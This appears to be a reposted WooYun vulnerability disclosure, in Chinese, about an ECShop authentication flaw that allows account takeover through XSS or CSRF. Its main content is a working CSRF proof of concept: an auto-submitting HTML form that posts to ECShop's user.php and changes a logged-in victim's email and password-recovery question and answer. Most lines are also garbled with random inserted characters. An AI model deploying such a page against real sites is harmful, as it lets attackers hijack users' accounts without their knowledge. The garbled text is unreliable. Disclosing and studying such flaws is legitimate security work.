简要描述:
* U- i U8 F; d6 \& |; P1 qecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现9 x9 l) y8 p5 b! N" Y: x# T6 [
; w5 f2 c2 Y; Z. U- KDemo For:http://www.wooyun.org/bug.php?action=view&id=395+ n7 N1 o3 s6 J
) s' ~' P/ [4 E- V1 S详细说明:
2 `- g: K) ?& [- Y' Y0 _1 n% w利用csrf和xss可以突破官方所说的“障碍”' r: g- F( x: ^ c) j. Q l
xss版本已经有人说明. F8 u) o% N6 u
这里给出csrf版本
5 x+ c L1 m6 N1 _4 @0 a0 T
* e+ `: H( o6 C1 f漏洞证明:
; x3 N6 C& j( n" _<html>6 `0 V _6 b& y1 L0 q) [- f
<body>
5 u4 @0 h' [% W% L; C, i; C<form action="http://www.wooyun.org/ecshop/user.php" method="POST"> c z& Q& ^( Y7 M
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
; [5 a" z, r; L' g* s v$ P' ]: F2 {: u# J<INPUT TYPE="text" NAME="act" value="act_edit_profile">5 L, b# I5 Q3 }3 O
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
' S. ^7 W9 ] l* r9 b7 O$ `+ X<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
. g9 ]0 U6 \, f2 W% v</body>% i& {- F- i: i9 x
<script>
* z F; s, X' x4 {9 edocument.forms[0].submit();
: P' w/ M( L8 _' Q( e- U</script>
! Z; |2 Z2 V; t' f</html>: _, s I# h& @
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
2 ~8 q( Y8 Y. A# l) D
0 ?: Z1 l: b1 [ R/ \ |